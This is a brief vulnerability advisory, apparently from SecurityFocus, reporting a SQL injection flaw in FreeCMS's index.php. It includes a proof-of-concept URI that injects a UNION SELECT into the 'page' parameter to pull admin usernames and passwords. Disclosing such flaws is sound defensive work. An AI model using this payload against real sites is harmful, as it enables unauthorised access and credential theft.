FreeCMS 'index.php' SQL Injection Vulnerability

An attacker can exploit these issues via a browser.

The following proof-of-concept URI is available:

http://www.example.com/index.php?page=-28+union+select+concat_ws(0x3a,admin,password)+from+admin/*


 

Privacy Statement
Copyright 2010, SecurityFocus